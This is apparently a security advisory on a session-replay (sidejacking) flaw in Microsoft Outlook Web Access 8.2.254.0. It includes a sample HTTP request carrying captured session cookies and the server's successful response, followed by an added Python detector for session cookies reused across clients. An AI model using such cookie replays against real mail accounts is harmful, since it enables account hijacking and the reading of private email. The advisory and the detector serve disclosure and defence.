Microsoft Outlook Web Access Session Replay Security Restriction Bypass Vulnerability

2011-10-28T00:00:00
ID SSV:23151
Type seebug
Reporter Root
Modified 2011-10-28T00:00:00

Description

BUGTRAQ ID: 50361

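Outlook Web Access lets users view communications in a conversation context rather than only as separate messages, which helps them handle the large volume of mail they receive every day.

Microsoft Outlook Web Access has a security restriction bypass vulnerability in its implementation. A remote attacker can exploit it to hijack web sessions or to bypass authentication through a replay attack, and gain access to the victim's email account.

SideJacking is the process of stealing web cookies and then replaying them to clone another user's web session. With the cloned web session, the attacker can make use of the site access the victim established earlier. This allows an attacker who can read network packets to steal all data submitted to the server or the web pages viewed by the client.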

Microsoft Outlook Web Access 8.2.254.0

Vendor patch:

Microsoft

The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.microsoft.com/technet/security/

GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt, */*
Referer: https://www.example.com/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000; cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx"; UserContext=e8997d6036554ada88a62dc9f2cf65d3

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58676
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-OWA-Version: 8.2.254.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 25 Oct 2011 15:00:01 GMT
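
An added example, not part of the original advisory: a minimal detector for the replay pattern described above, which flags a session cookie value presented by more than one client (IP address and User-Agent pair). The log records are constructed, and the record layout and function names are assumptions; only the cookie name sessionid comes from the request shown on this page.

```python
from collections import defaultdict

UA_IE = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
UA_OTHER = "Mozilla/5.0 (X11; Linux x86_64)"

# Constructed sample records: (client IP, User-Agent, raw Cookie header).
# All values are made up for this example.
SAMPLE_LOG = [
    ("10.0.0.5", UA_IE, 'sessionid=sess-A:000; cadata="x1"; UserContext=u1'),
    ("10.0.0.5", UA_IE, 'sessionid=sess-A:000; cadata="x1"; UserContext=u1'),
    ("10.0.0.9", UA_IE, 'sessionid=sess-B:000; cadata="x2"; UserContext=u2'),
    ("192.0.2.44", UA_OTHER, 'sessionid=sess-A:000; cadata="x1"; UserContext=u1'),
    ("10.0.0.7", UA_IE, "UserContext=u3"),  # no session cookie yet
]


def parse_cookies(header):
    """Split a Cookie request header into a {name: value} dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:  # skip fragments that have no "="
            cookies[name] = value.strip('"')
    return cookies


def find_replayed_sessions(records, cookie_name="sessionid"):
    """Return {session id: [(ip, user_agent), ...]} for every session id
    that was sent by more than one distinct client."""
    clients = defaultdict(list)
    for ip, user_agent, cookie_header in records:
        sid = parse_cookies(cookie_header).get(cookie_name)
        if sid is None:
            continue
        fingerprint = (ip, user_agent)
        if fingerprint not in clients[sid]:
            clients[sid].append(fingerprint)
    # An IP change alone can be roaming or NAT; a change of both IP and
    # User-Agent within one session is the stronger replay signal.
    return {sid: fps for sid, fps in clients.items() if len(fps) > 1}


if __name__ == "__main__":
    for sid, fps in find_replayed_sessions(SAMPLE_LOG).items():
        print(f"session {sid} used by {len(fps)} clients: {fps}")
```
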